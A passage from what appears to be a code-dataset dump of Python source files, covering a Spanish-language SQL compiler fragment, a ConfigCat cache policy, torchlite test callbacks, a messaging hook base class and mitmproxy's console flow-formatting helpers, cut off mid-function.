code.append(c3d.aumentarP())\n \n return code\n\nclass IdentificadorColumna(Instruccion):\n def __init__(self, id, linea, columna):\n self.id = id\n Instruccion.__init__(self,Tipo(Tipo_Dato.ID),linea,columna,strGram)\n\n def ejecutar(self, tabla, arbol):\n super().ejecutar(tabla,arbol)\n variable = tabla.getVariable(self.id)\n if variable == None:\n error = Excepcion(\"42P10\",\"Semantico\",\"La columna \"+str(self.id)+\" no existe\",self.linea,self.columna)\n arbol.excepciones.append(error)\n arbol.consola.append(error.toString())\n return error\n self.tipo = variable.tipo\n return variable.valor.ejecutar(tabla, arbol)\n\n def generar3D(self, tabla, arbol):\n super().generar3D(tabla,arbol)"} {"ext": "py", "sha": "1a30050b9c482e1742df7e3ab1665fb4995cac5b", "content": "import logging\nimport sys\nfrom requests import HTTPError\n\nfrom .readwritelock import ReadWriteLock\nfrom .interfaces import CachePolicy\n\nlog = logging.getLogger(sys.modules[__name__].__name__)\n\n\nclass ManualPollingCachePolicy(CachePolicy):\n def __init__(self, config_fetcher, config_cache):\n self._config_fetcher = config_fetcher\n self._config_cache = config_cache\n self._lock = ReadWriteLock()\n\n def get(self):\n try:\n self._lock.acquire_read()\n\n config = self._config_cache.get()\n return config\n finally:\n self._lock.release_read()\n\n def force_refresh(self):\n force_fetch = False\n\n try:\n self._lock.acquire_read()\n config = self._config_cache.get()\n force_fetch = not bool(config)\n finally:\n self._lock.release_read()\n\n try:\n configuration_response = self._config_fetcher.get_configuration_json(\n force_fetch\n )\n if configuration_response.is_fetched():\n configuration = configuration_response.json()\n try:\n self._lock.acquire_write()\n self._config_cache.set(configuration)\n finally:\n self._lock.release_write()\n\n except HTTPError as e:\n log.error(\n \"Double-check your SDK Key at https://app.configcat.com/sdkkey.\"\n \" Received unexpected response: [%s]\" % str(e.response)\n )\n except:\n log.exception(sys.exc_info()[0])\n\n def stop(self):\n pass\n"} {"ext": "py", "sha": "1a30056debc252823120b2717a4d36ee3a01f83e", "content": "\"\"\"\nThis module contains callbacks used during the test phase.\n\"\"\"\nfrom torchlite.data.datasets import ImageDataset\nfrom tqdm import tqdm\n\n\nclass TestCallback:\n def __init__(self):\n self.validation_data = None\n self.params = None\n self.model = None\n\n def on_test_begin(self, logs=None):\n pass\n\n def on_test_end(self, logs=None):\n pass\n\n def on_batch_begin(self, batch, logs=None):\n pass\n\n def on_batch_end(self, batch, logs=None):\n pass\n\n\nclass TestCallbackList(object):\n \"\"\"Container abstracting a list of callbacks.\n Args:\n callbacks: List of `Callback` instances.\n queue_length: Queue length for keeping\n running statistics over callback execution time.\n \"\"\"\n\n def __init__(self, callbacks=None, queue_length=10):\n callbacks = callbacks or []\n self.callbacks = [c for c in callbacks]\n self.queue_length = queue_length\n\n def append(self, callback):\n assert isinstance(callback, TestCallback), \\\n \"Your callback is not an instance of TestCallback: {}\".format(callback)\n self.callbacks.append(callback)\n\n def on_test_begin(self, logs=None):\n \"\"\"Called at the beginning of testing.\n Args:\n logs: dictionary of logs.\n \"\"\"\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_test_begin(logs)\n\n def on_test_end(self, logs=None):\n \"\"\"Called at the end of testing.\n Args:\n logs: dictionary of logs.\n \"\"\"\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_test_end(logs)\n\n def on_batch_begin(self, batch, logs=None):\n \"\"\"Called right before processing a batch.\n Args:\n batch: integer, index of batch within the current epoch.\n logs: dictionary of logs.\n \"\"\"\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_batch_begin(batch, logs)\n\n def on_batch_end(self, batch, logs=None):\n \"\"\"Called at the end of a batch.\n Args:\n batch: integer, index of batch within the current epoch.\n logs: dictionary of logs.\n \"\"\"\n logs = logs or {}\n for callback in self.callbacks:\n callback.on_batch_end(batch, logs)\n\n def __iter__(self):\n return iter(self.callbacks)\n\n\nclass TQDM(TestCallback):\n def __init__(self):\n super().__init__()\n self.pbar = None\n\n def on_test_begin(self, logs=None):\n test_loader_len = len(logs[\"loader\"])\n self.pbar = tqdm(total=test_loader_len, desc=\"Classifying\")\n\n def on_batch_end(self, batch, logs=None):\n self.pbar.update(1)\n\n def on_test_end(self, logs=None):\n print()\n\n\nclass ActivationMapVisualizerCallback(TestCallback):\n def __init__(self, filename):\n \"\"\"\n Store an image with heatmap activations in a heatmaps list\n using the Grad_cam++ technique: https://arxiv.org/abs/1710.11063\n # TODO may combines with TensorboardVisualizer?\n\n /!\\ This technique only works with image torchlite.data.datasets.ImagesDataset\n Args:\n filename (str): The file name that you want to visualize\n \"\"\"\n super().__init__()\n self.filename = filename\n self.heatmap = None\n\n def on_test_end(self, logs=None):\n model = self.model\n ds = logs[\"loader\"].dataset if logs[\"loader\"] else None\n assert isinstance(ds, ImageDataset), \\\n \"ActivationMapVisualizer: The loader is not an instance of torchlite.data.datasets.ImagesDataset\"\n image, label, _ = ds.get_by_name(self.filename)\n # TODO finish grad cam here https://github.com/adityac94/Grad_CAM_plus_plus/blob/master/misc/utils.py#L51\n\n @property\n def get_heatmap(self):\n return self.heatmap\n\n\nclass TTACallback(TestCallback):\n def __init__(self):\n \"\"\"\n Test time augmentation callback\n \"\"\"\n # TODO implement https://github.com/fastai/fastai/blob/master/fastai/learner.py#L242\n super().__init__()\n"} {"ext": "py", "sha": "1a30059e79652b426d539e42af781474e26d2df8", "content": "from .util import Configurable, Openable, pretty_str\n\n\n@pretty_str\nclass Hook(Configurable, Openable):\n \"\"\"\n Base of all hook classes, performs any form of processing on messages from all connected\n plugs, via the provided host instance.\n\n Instantiation may raise :class:`.ConfigError` if the provided configuration is invalid.\n\n Attributes:\n virtual (bool):\n ``True`` if managed by another component (e.g. a hook that exposes plug functionality).\n \"\"\"\n\n def __init__(self, name, config, host, virtual=False):\n super().__init__(name, config, host)\n self.virtual = virtual\n\n async def start(self):\n \"\"\"\n Perform any setup tasks.\n \"\"\"\n\n async def stop(self):\n \"\"\"\n Perform any teardown tasks.\n \"\"\"\n\n def on_load(self):\n \"\"\"\n Perform any additional one-time setup that requires other plugs or hooks to be loaded.\n \"\"\"\n\n async def channel_migrate(self, old, new):\n \"\"\"\n Move any private data between channels on admin request. This is intended to cover data\n keyed by channel sources and plug network identifiers.\n\n Args:\n old (.Channel):\n Existing channel with local data.\n new (.Channel):\n Target replacement channel to migrate data to.\n\n Returns:\n bool:\n ``True`` if any data was migrated for the requested channel.\n \"\"\"\n return False\n\n async def before_send(self, channel, msg):\n \"\"\"\n Modify an outgoing message before it's pushed to the network. The ``(channel, msg)`` pair\n must be returned, so hooks may modify in-place or return a different pair. This method is\n called for each hook, one after another. If ``channel`` is modified, the sending will\n restart on the new channel, meaning this method will be called again for all hooks.\n\n Hooks may also suppress a message (e.g. if their actions caused it, but it bears no value\n to the network) by returning ``None``.\n\n Args:\n channel (.Channel):\n Original source of this message.\n msg (.Message):\n Raw message received from another plug.\n\n Returns:\n (.Channel, .Message) tuple:\n The augmented or replacement pair, or ``None`` to suppress this message.\n \"\"\"\n return (channel, msg)\n\n async def before_receive(self, sent, source, primary):\n \"\"\"\n Modify an incoming message before it's pushed to other hooks. The ``sent`` object must be\n returned, so hooks may modify in-place or return a different object. This method is called\n for each hook, one after another, so any time-consuming tasks should be deferred to\n :meth:`process` (which is run for all hooks in parallel).\n\n Hooks may also suppress a message (e.g. if their actions caused it, but it bears no value\n to the rest of the system) by returning ``None``.\n\n Args:\n sent (.SentMessage):\n Raw message received from another plug.\n source (.Message):\n Original message data used to generate the raw message, if sent via the plug (e.g.\n from another hook), equivalent to ``msg`` if the source is otherwise unknown.\n primary (bool):\n ``False`` for supplementary messages if the source message required multiple raw\n messages in order to represent it (e.g. messages with multiple attachments where\n the underlying network doesn't support it), otherwise ``True``.\n\n Returns:\n .SentMessage:\n The augmented or replacement message, or ``None`` to suppress this message.\n \"\"\"\n return sent\n\n async def on_receive(self, sent, source, primary):\n \"\"\"\n Handle an incoming message received by any plug.\n\n Args:\n sent (.SentMessage):\n Raw message received from another plug.\n source (.Message):\n Original message data used to generate the raw message, if sent via the plug (e.g.\n from another hook), equivalent to ``msg`` if the source is otherwise unknown.\n primary (bool):\n ``False`` for supplementary messages if the source message required multiple raw\n messages in order to represent it (e.g. messages with multiple attachments where\n the underlying network doesn't support it), otherwise ``True``.\n \"\"\"\n\n def on_config_change(self, source):\n \"\"\"\n Handle a configuration change from another plug or hook.\n\n Args:\n source (.Configurable):\n Source plug or hook that triggered the event.\n \"\"\"\n\n def __repr__(self):\n return \"<{}: {}>\".format(self.__class__.__name__, self.name)\n\n\nclass ResourceHook(Hook):\n \"\"\"\n Variant of hooks that globally provide access to some resource.\n\n Only one of each class may be loaded, which happens before regular hooks, and such hooks are\n keyed by their class rather than a name, allowing for easier lookups.\n \"\"\"\n"} {"ext": "py", "sha": "1a3005cef96dbe2a43a46cf679a83e061a6ffb5c", "content": "import enum\nimport platform\nimport typing\nimport math\nfrom functools import lru_cache\nfrom publicsuffix2 import get_sld, get_tld\n\nimport urwid\nimport urwid.util\n\nfrom mitmproxy import flow\nfrom mitmproxy.http import HTTPFlow\nfrom mitmproxy.utils import human, emoji\nfrom mitmproxy.tcp import TCPFlow\nfrom mitmproxy import dns\nfrom mitmproxy.dns import DNSFlow\n\n# Detect Windows Subsystem for Linux and Windows\nIS_WINDOWS_OR_WSL = \"Microsoft\" in platform.platform() or \"Windows\" in platform.platform()\n\n\ndef is_keypress(k):\n \"\"\"\n Is this input event a keypress?\n \"\"\"\n if isinstance(k, str):\n return True\n\n\ndef highlight_key(str, key, textattr=\"text\", keyattr=\"key\"):\n l = []\n parts = str.split(key, 1)\n if parts[0]:\n l.append((textattr, parts[0]))\n l.append((keyattr, key))\n if parts[1]:\n l.append((textattr, parts[1]))\n return l\n\n\nKEY_MAX = 30\n\n\ndef format_keyvals(\n entries: typing.Iterable[typing.Tuple[str, typing.Union[None, str, urwid.Widget]]],\n key_format: str = \"key\",\n value_format: str = \"text\",\n indent: int = 0\n) -> typing.List[urwid.Columns]:\n \"\"\"\n Format a list of (key, value) tuples.\n\n Args:\n entries: The list to format. keys must be strings, values can also be None or urwid widgets.\n The latter makes it possible to use the result of format_keyvals() as a value.\n key_format: The display attribute for the key.\n value_format: The display attribute for the value.\n indent: Additional indent to apply.\n \"\"\"\n max_key_len = max((len(k) for k, v in entries if k is not None), default=0)\n max_key_len = min(max_key_len, KEY_MAX)\n\n if indent > 2:\n indent -= 2 # We use dividechars=2 below, which already adds two empty spaces\n\n ret = []\n for k, v in entries:\n if v is None:\n v = urwid.Text(\"\")\n elif not isinstance(v, urwid.Widget):\n v = urwid.Text([(value_format, v)])\n ret.append(\n urwid.Columns(\n [\n (\"fixed\", indent, urwid.Text(\"\")),\n (\n \"fixed\",\n max_key_len,\n urwid.Text([(key_format, k)])\n ),\n v\n ],\n dividechars=2\n )\n )\n return ret\n\n\ndef fcol(s: str, attr: str) -> typing.Tuple[str, int, urwid.Text]:\n s = str(s)\n return (\n \"fixed\",\n len(s),\n urwid.Text(\n [\n (attr, s)\n ]\n )\n )\n\n\nif urwid.util.detected_encoding:\n SYMBOL_REPLAY = \"\\u21ba\"\n SYMBOL_RETURN = \"\\u2190\"\n SYMBOL_MARK = \"\\u25cf\"\n SYMBOL_UP = \"\\u21E7\"\n SYMBOL_DOWN = \"\\u21E9\"\n SYMBOL_ELLIPSIS = \"\\u2026\"\n SYMBOL_FROM_CLIENT = \"\\u21d2\"\n SYMBOL_TO_CLIENT = \"\\u21d0\"\nelse:\n SYMBOL_REPLAY = \"[r]\"\n SYMBOL_RETURN = \"<-\"\n SYMBOL_MARK = \"#\"\n SYMBOL_UP = \"^\"\n SYMBOL_DOWN = \" \"\n SYMBOL_ELLIPSIS = \"~\"\n SYMBOL_FROM_CLIENT = \"->\"\n SYMBOL_TO_CLIENT = \"<-\"\n\nSCHEME_STYLES = {\n 'http': 'scheme_http',\n 'https': 'scheme_https',\n 'ws': 'scheme_ws',\n 'wss': 'scheme_wss',\n 'tcp': 'scheme_tcp',\n 'dns': 'scheme_dns',\n}\nHTTP_REQUEST_METHOD_STYLES = {\n 'GET': 'method_get',\n 'POST': 'method_post',\n 'DELETE': 'method_delete',\n 'HEAD': 'method_head',\n 'PUT': 'method_put'\n}\nHTTP_RESPONSE_CODE_STYLE = {\n 2: \"code_200\",\n 3: \"code_300\",\n 4: \"code_400\",\n 5: \"code_500\",\n}\n\n\nclass RenderMode(enum.Enum):\n TABLE = 1\n \"\"\"The flow list in table format, i.e. one row per flow.\"\"\"\n LIST = 2\n \"\"\"The flow list in list format, i.e. potentially multiple rows per flow.\"\"\"\n DETAILVIEW = 3\n \"\"\"The top lines in the detail view.\"\"\"\n\n\ndef fixlen(s: str, maxlen: int) -> str:\n if len(s) <= maxlen:\n return s.ljust(maxlen)\n else:\n return s[0:maxlen - len(SYMBOL_ELLIPSIS)] + SYMBOL_ELLIPSIS\n\n\ndef fixlen_r(s: str, maxlen: int) -> str:\n if len(s) <= maxlen:\n return s.rjust(maxlen)\n else:\n return SYMBOL_ELLIPSIS + s[len(s) - maxlen + len(SYMBOL_ELLIPSIS):]\n\n\ndef render_marker(marker: str) -> str:\n rendered = emoji.emoji.get(marker, SYMBOL_MARK)\n\n # The marker can only be one glyph. Some emoji that use zero-width joiners (ZWJ)\n # will not be rendered as a single glyph and instead will show\n # multiple glyphs. Just use the first glyph as a fallback.\n # https://emojipedia.org/emoji-zwj-sequence/\n return rendered[0]\n\n\nclass TruncatedText(urwid.Widget):\n def __init__(self, text, attr, align='left'):\n self.text = text\n self.attr = attr\n self.align = align\n super().__init__()\n\n def pack(self, size, focus=False):\n return (len(self.text), 1)\n\n def rows(self, size, focus=False):\n return 1\n\n def render(self, size, focus=False):\n text = self.text\n attr = self.attr\n if self.align == 'right':\n text = text[::-1]\n attr = attr[::-1]\n\n text_len = urwid.util.calc_width(text, 0, len(text))\n if size is not None and len(size) > 0:\n width = size[0]\n else:\n width = text_len\n\n if width >= text_len:\n remaining = width - text_len\n if remaining > 0:\n c_text = text + ' ' * remaining\n c_attr = attr + [('text', remaining)]\n else:\n c_text = text\n c_attr = attr\n else:\n trim = urwid.util.calc_trim_text(text, 0, width - 1, 0, width - 1)\n visible_text = text[0:trim[1]]\n if trim[3] == 1:\n visible_text += ' '\n c_text = visible_text + SYMBOL_ELLIPSIS\n c_attr = (urwid.util.rle_subseg(attr, 0, len(visible_text.encode())) +\n [('focus', len(SYMBOL_ELLIPSIS.encode()))])\n\n if self.align == 'right':\n c_text = c_text[::-1]\n c_attr = c_attr[::-1]\n\n return urwid.TextCanvas([c_text.encode()], [c_attr], maxcol=width)\n\n\ndef truncated_plain(text, attr, align='left'):\n return TruncatedText(text, [(attr, len(text.encode()))], align)\n\n\n# Work around https://github.com/urwid/urwid/pull/330\ndef rle_append_beginning_modify(rle, a_r):\n \"\"\"\n Append (a, r) (unpacked from *a_r*) to BEGINNING of rle.\n Merge with first run when possible\n\n MODIFIES rle parameter contents. Returns None.\n \"\"\"\n a, r = a_r\n if not rle:\n rle[:] = [(a, r)]\n else:\n al, run = rle[0]\n if a == al:\n rle[0] = (a, run + r)\n else:\n rle[0:0] = [(a, r)]\n\n\ndef colorize_host(host):\n tld = get_tld(host)\n sld = get_sld(host)\n\n attr = []\n\n tld_size = len(tld)\n sld_size = len(sld) - tld_size\n\n for letter in reversed(range(len(host))):\n character = host[letter]\n if tld_size > 0:\n style = 'url_domain'\n tld_size -= 1\n elif tld_size == 0:\n style = 'text'\n tld_size -= 1\n elif sld_size > 0:\n sld_size -= 1\n style = 'url_extension'\n else:\n style = 'text'\n rle_append_beginning_modify(attr, (style, len(character.encode())))\n return attr\n\n\ndef colorize_req(s):\n path = s.split('?', 2)[0]\n i_query = len(path)\n i_last_slash = path.rfind('/')\n i_ext = path[i_last_slash + 1:].rfind('.')\n i_ext = i_last_slash + i_ext if i_ext >= 0 else len(s)\n in_val = False\n attr = []\n for i in range(len(s)):\n c = s[i]\n if ((i < i_query and c == '/') or\n (i < i_query and i > i_last_slash and c == '.') or\n (i == i_query)):\n a = 'url_punctuation'\n elif i > i_query:\n if in_val:\n if c == '&':\n in_val = False\n a = 'url_punctuation'\n else:\n a = 'url_query_value'\n else:\n if c == '=':\n in_val = True\n a = 'url_punctuation'\n else:\n a = 'url_query_key'\n elif i > i_ext:\n a = 'url_extension'\n elif i > i_last_slash:\n a = 'url_filename'\n else:\n a = 'text'\n urwid.util.rle_append_modify(attr, (a, len(c.encode())))\n return attr\n\n\ndef colorize_url(url):\n parts = url.split('/', 3)\n if len(parts) < 4 or len(parts[1]) > 0 or parts[0][-1:] != ':':\n return [('error', len(url))] # bad URL\n return [\n (SCHEME_STYLES.get(parts[0], \"scheme_other\"), len(parts[0]) - 1),\n ('url_punctuation', 3), # ://\n ] + colorize_host(parts[2]) + colorize_req('/' + parts[3])\n\n\ndef format_http_content_type(content_type: str) -> typing.Tuple[str, str]:\n content_type = content_type.split(\";\")[0]\n if content_type.endswith('/javascript'):\n style = 'content_script'\n elif content_type.startswith('text/'):\n style = 'content_text'\n elif (content_type.startswith('image/') or\n content_type.startswith('video/') or\n content_type.startswith('font/') or\n \"/x-font-\" in content_type):\n style = 'content_media'\n elif content_type.endswith('/json') or content_type.endswith('/xml'):\n style = 'content_data'\n elif content_type.startswith('application/'):\n style = 'content_raw'\n else:\n style = 'content_other'\n return content_type, style\n\n\ndef format_duration(duration: float) -> typing.Tuple[str, str]:\n pretty_duration = human.pretty_duration(duration)\n style = 'gradient_%02d' % int(99 - 100 * min(math.log2(1 + 1000 * duration) / 12, 0.99))\n return pretty_duration, style\n\n\ndef format_size(num_bytes: int) -> typing.Tuple[str, str]:\n pretty_size = human.pretty_size(num_bytes)\n style = 'gradient_%02d' % int(99 - 100 * min(math.log2(1 + num_bytes) / 20, 0.99))\n return pretty_size, style\n\n\ndef format_left_indicators(\n *,\n focused: bool,\n intercepted: bool,\n timestamp: float\n):\n indicators: typing.List[typing.Union[str, typing.Tuple[str, str]]] = []\n if focused:\n indicators.append((\"focus\", \">>\"))\n else:\n indicators.append(\" \")\n pretty_timestamp = human.format_timestamp(timestamp)[-8:]\n if intercepted:\n indicators.append((\"intercept\", pretty_timestamp))\n else:\n indicators.append((\"text\", pretty_timestamp))\n return \"fixed\", 10, urwid.Text(indicators)\n\n\ndef format_right_indicators(\n *,\n replay: bool,\n marked: str,\n):\n indicators: typing.List[typing.Union[str, typing.Tuple[str, str]]] = []\n if replay:\n indicators.append((\"replay\", SYMBOL_REPLAY))\n else:\n indicators.append(\" \")\n if bool(marked):\n indicators.append((\"mark\", render_marker(marked)))\n else:\n indicators.append(\" \")\n return \"fixed\", 3, urwid.Text(indicators)\n\n\n@lru_cache(maxsize=800)\ndef format_http_flow_list(\n *,\n render_mode: RenderMode,\n focused: bool,\n marked: str,\n is_replay: bool,\n request_method: str,\n request_scheme: str,\n request_host: str,\n request_path: str,\n request_url: str,\n request_http_version: str,\n request_timestamp: float,\n request_is_push_promise: bool,\n intercepted: bool,\n response_code: typing.Optional[int],\n response_reason: typing.Optional[str],\n response_content_length: typing.Optional[int],\n response_content_type: typing.Optional[str],\n duration: typing.Optional[float],\n error_message: typing.Optional[str],\n) -> urwid.Widget:\n req = []\n\n if render_mode is RenderMode.DETAILVIEW:\n req.append(fcol(human.format_timestamp(request_timestamp), \"highlight\"))\n else:\n if focused:\n req.append(fcol(\">>\", \"focus\"))\n else:\n req.append(fcol(\" \", \"focus\"))\n\n method_style = HTTP_REQUEST_METHOD_STYLES.get(request_method, \"method_other\")\n req.append(fcol(request_method, method_style))\n\n if request_is_push_promise:\n req.append(fcol('PUSH_PROMISE', 'method_http2_push'))\n\n preamble_len = sum(x[1] for x in req) + len(req) - 1\n\n if request_http_version not in (\"HTTP/1.0\", \"HTTP/1.1\"):\n request_url += \" \" + request_http_version\n if intercepted and not response_code:\n url_style = \"intercept\"\n elif response_code or error_message:\n url_style = \"text\"\n else:\n url_style = \"title\"\n\n if render_mode is RenderMode.DETAILVIEW:\n req.append(\n urwid.Text([(url_style, request_url)])\n )\n else:\n req.append(truncated_plain(request_url, url_style))\n\n req.append(format_right_indicators(replay=is_replay, marked=marked))\n\n resp = [\n (\"fixed\", preamble_len, urwid.Text(\"\"))\n ]\n if response_code:\n if intercepted:\n style = \"intercept\"\n else:\n style = \"\"\n\n status_style = style or HTTP_RESPONSE_CODE_STYLE.get(response_code // 100, \"code_other\")\n resp.append(fcol(SYMBOL_RETURN, status_style))\n resp.append(fcol(str(response_code), status_style))\n if response_reason and render_mode is RenderMode.DETAILVIEW:\n resp.append(fcol(response_reason, status_style))\n\n if response_content_type:\n ct, ct_style = format_http_content_type(response_content_type)\n resp.append(fcol(ct, style or ct_style))\n\n if response_content_length:\n size, size_style = format_size(response_content_length)\n elif response_content_length == 0:\n size = \"[no content]\"\n size_style = \"text\"\n else:\n size = \"[content missing]\"\n size_style = \"text\"\n resp.append(fcol(size, style or size_style))\n\n if duration:\n dur, dur_style = format_duration(duration)\n resp.append(fcol(dur, style or dur_style))\n elif error_message:\n resp.append(fcol(SYMBOL_RETURN, \"error\"))\n resp.append(urwid.Text([(\"error\", error_message)]))\n\n return urwid.Pile([\n urwid.Columns(req, dividechars=1),\n urwid.Columns(resp, dividechars=1)\n ])\n\n\n@lru_cache(maxsize=800)\ndef format_http_flow_table(\n *,\n render_mode: RenderMode,\n focused: bool,\n marked: str,\n is_replay: typing.Optional[str],\n request_method: str,\n request_scheme: str,\n request_host: str,\n request_path: str,\n request_url: str,\n request_http_version: str,\n request_timestamp: float,\n request_is_push_promise: bool,\n intercepted: bool,\n response_code: typing.Optional[int],\n response_reason: typing.Optional[str],\n response_content_length: typing.Optional[int],\n response_content_type: typing.Optional[str],\n duration: typing.Optional[float],\n error_message: typing.Optional[str],\n) -> urwid.Widget:\n items = [\n format_left_indicators(\n focused=focused,\n intercepted=intercepted,\n timestamp=request_timestamp\n )\n ]\n\n if intercepted and not response_code:\n request_style = \"intercept\"\n else:\n request_style = \"\"\n\n scheme_style = request_style or SCHEME_STYLES.get(request_scheme, \"scheme_other\")\n items.append(fcol(fixlen(request_scheme.upper(), 5), scheme_style))\n\n if request_is_push_promise:\n method_style = 'method_http2_push'\n else:\n method_style = request_style or HTTP_REQUEST_METHOD_STYLES.get(request_method, \"method_other\")\n items.append(fcol(fixlen(request_method, 4), method_style))\n\n items.append(('weight', 0.25, TruncatedText(request_host, colorize_host(request_host), 'right')))\n items.append(('weight', 1.0, TruncatedText(request_path, colorize_req(request_path), 'left')))\n\n if intercepted and response_code:\n response_style = \"intercept\"\n else:\n response_style = \"\"\n\n if response_code:\n\n status = str(response_code)\n status_style = response_style or HTTP_RESPONSE_CODE_STYLE.get(response_code // 100, \"code_other\")\n\n if response_content_length and response_content_type:\n content, content_style = format_http_content_type(response_content_type)\n content_style = response_style or content_style\n elif response_content_length:\n content = ''\n content_style = 'content_none'\n elif response_content_length == 0:\n content = \"[no content]\"\n content_style = 'content_none'\n else:\n content = \"[content missing]\"\n content_style = 'content_none'\n\n elif error_message:\n status = 'err'\n status_style = 'error'\n content = error_message\n content_style = 'error'\n\n else:\n status = ''\n status_style = 'text'\n content = ''\n content_style = ''\n\n items.append(fcol(fixlen(status, 3), status_style))\n items.append(('weight', 0.15, truncated_plain(content, content_style, 'right')))\n\n if response_content_length:\n size, size_style = format_size(response_content_length)\n items.append(fcol(fixlen_r(size, 5), response_style or size_style))\n else:\n items.append((\"fixed\", 5, urwid.Text(\"\")))\n\n if duration:\n duration_pretty, duration_style = format_duration(duration)\n items.append(fcol(fixlen_r(duration_pretty, 5), response_style or duration_style))\n else:\n items.append((\"fixed\", 5, urwid.Text(\"\")))\n\n items.append(format_right_indicators(\n replay=bool(is_replay),\n marked=marked,\n ))\n return urwid.Columns(items, dividechars=1, min_width=15)\n\n\n@lru_cache(maxsize=800)\ndef format_tcp_flow(\n *,\n render_mode: RenderMode,\n focused: bool,\n timestamp_start: float,\n marked: str,\n client_address,\n server_address,\n total_size: int,\n duration: typing.Optional[float],\n error_message: typing.Optional[str],\n):\n conn = f\"{human.format_address(client_address)} <-> {human.format_address(server_address)}\"\n\n items = []\n\n if render_mode in (RenderMode.TABLE, RenderMode.DETAILVIEW):\n items.append(\n format_left_indicators(focused=focused, intercepted=False, timestamp=timestamp_start)\n )\n else:\n if focused:\n items.append(fcol(\">>\", \"focus\"))\n else:\n items.append(fcol(\" \", \"focus\"))\n\n if render_mode is RenderMode.TABLE:\n items.append(fcol(\"TCP \", SCHEME_STYLES[\"tcp\"]))\n else:\n items.append(fcol(\"TCP\", SCHEME_STYLES[\"tcp\"]))\n\n items.append(('weight', 1.0, truncated_plain(conn, \"text\", 'left')))\n if error_message:\n items.append(('weight', 1.0, truncated_plain(error_message, \"error\", 'left')))\n\n if total_size:\n size, size_style = format_size(total_size)\n items.append(fcol(fixlen_r(size, 5), size_style))\n else:\n items.append((\"fixed\", 5, urwid.Text(\"\")))\n\n if duration:\n duration_pretty, duration_style = format_duration(duration)\n items.append(fcol(fixlen_r(duration_pretty, 5), duration_style))\n else:\n items.append((\"fixed\", 5, urwid.Text(\"\")))\n\n items.append(format_right_indicators(replay=False, marked=marked))\n\n return urwid.Pile([\n urwid.Columns(items, dividechars=1, min_width=15)\n ])\n\n\n@lru_cache(maxsize=800)\ndef format_dns_flow(\n *,\n render_mode: RenderMode,\n focused: bool,\n intercepted: bool,\n marked: str,\n is_replay: typing.Optional[str],\n op_code: str,\n request_timestamp: float,\n domain: str,\n type: str,\n response_code: typing.Optional[str],\n response_code_http_equiv: int,\n answer: typing.Optional[str],\n error_message: str,\n duration: typing.Optional[float],\n):\n items = []\n\n if render_mode in (RenderMode.TABLE, RenderMode.DETAILVIEW):\n items.append(format_left_indicators(focused=focused, intercepted=intercepted, timestamp=request_timestamp))\n else:\n items.append(fcol(\">>\" if focused else \" \", \"focus\"))\n\n scheme_style = \"intercepted\" if intercepted else SCHEME_STYLES[\"dns\"]\n t = f\"DNS {op_code}\"\n if render_mode is RenderMode.TABLE:\n t = fixlen(t, 10)\n items.append(fcol(t, scheme_style))\n items.append(('weight', 0.5, TruncatedText(domain, colorize_host(domain), 'right')))\n items.append(fcol(\"(\" + fixlen(type, 5)[:len(type)] + \") =\", \"text\"))\n\n items.append((\"weight\", 1, (\n truncated_plain(\"...\" if answer is None else \"?\" if not answer else answer, \"text\")\n if error_message is None else\n truncated_plain(error_message, \"error\")\n )))\n status_style = \"intercepted\" if intercepted else HTTP_RESPONSE_CODE_STYLE.get(response_code_http_equiv // 100, \"code_other\")\n items.append(fcol(fixlen(\"\" if response_code is None else response_code, 9), status_style))\n\n if duration:\n duration_pretty, duration_style = format_duration(duration)\n items.append(fcol(fixlen_r(duration_pretty, 5), duration_style))\n else:\n items.append((\"fixed\", 5, urwid.Text(\"\")))\n\n items.append(format_right_indicators(\n replay=bool(is_replay),\n marked=marked,\n ))\n return urwid.Pile([\n urwid.Columns(items, dividechars=1, min_width=15)\n ])\n\n\ndef format_flow(\n f: flow.Flow,\n *,\n render_mode: RenderMode,\n hostheader: bool = False, # pass options directly if we need more stuff from them\n focused: bool = True,\n) -> urwid.Widget:\n \"\"\"\n This functions calls the proper renderer depending on the flow type.\n We also want to cache the renderer output, so we extract all attributes\n relevant for display and call the render with only that. This assures that rows\n are updated if the flow is changed.\n \"\"\"\n duration: typing.Optional[float]\n error_message: typing.Optional[str]\n if f.error:\n error_message = f.error.msg\n else:\n error_message = None\n\n if isinstance(f, TCPFlow):\n total_size = 0\n for message in f.messages:\n total_size += len(message.content)\n if f.messages:\n duration = f.messages[-1].timestamp - f.client_conn.timestamp_start\n else:\n duration = None\n return format_tcp_flow(\n render_mode=render_mode,\n focused=focused,\n timestamp_start=f.client_conn.timestamp_start,\n marked=f.marked,\n client_address=f.client_conn.peername,\n server_address=f.server_conn.address,\n total_size=total_size,\n duration=duration,\n error_message=error_message,\n )\n elif isinstance(f, DNSFlow):\n if f.response:\n duration = f.response.timestamp - f.request.timestamp\n response_code_str: typing.Optional[str] = dns.response_codes.to_str(f.response.response_code)\n response_code_http_equiv = dns.response_codes.http_equiv_status_code(f.response.response_code)\n answer = \", \".join(str(x) for x in f.response.answers)\n else:\n duration = None\n response_code_str = None\n response_code_http_equiv = 0\n answer = None\n return format_dns_flow(\n render_mode=render_mode,\n focused=focused,\n intercepted=f.intercepted,\n marked=f.marked,\n is_replay=f.is_replay,\n op_code=dns.op_codes.to_str(f.request.op_code),\n request_timestamp=f.request.timestamp,\n domain=f.request.questions[0].name if f.request.questions else \"\",\n type=dns.types.to_str(f.request.questions[0].type) if f.request.questions else \"\",\n response_code=response_code_str,\n response_code_http_equiv=response_code_http_equiv,\n answer=answer,\n error_message=error_message,\n duration=duration,\n )\n elif isinstance(f, HTTPFlow):\n intercepted = f.intercepted\n response_content_length: typing.Optional[int]\n if f.response:\n if f.response.raw_content is not None:\n response_content_length = len(f.response.raw_content)\n else:\n response_content_length = None\n response_code: typing.Optional[int] = f.response.status_code\n response_reason: typing.Optional[str] = f.response.reason\n response_content_type = f.response.headers.get(\"content-type\")\n if f.response.timestamp_end:\n duration = max([f.response.timestamp_end - f.request.timestamp_start, 0])\n else:\n duration = None\n else:\n response_content_length = None\n response_code = None\n response_reason = None\n response_content_type = None\n duration = None\n\n scheme = f.request.scheme\n if f.websocket is not None:\n if scheme == \"https\":\n scheme = \"wss\"\n elif scheme == \"http\":\n scheme = \"ws\"\n\n if render_mode in (RenderMode.LIST, RenderMode.DETAILVIEW):\n render_func = format_http_flow_list\n else:\n render_func = format_http_flow_table\n return render_func(\n render_mode=render_mode,\n focused=focused,\n marked=f.marked,\n is_replay=f.is_replay,\n request_method=f.request.method,\n 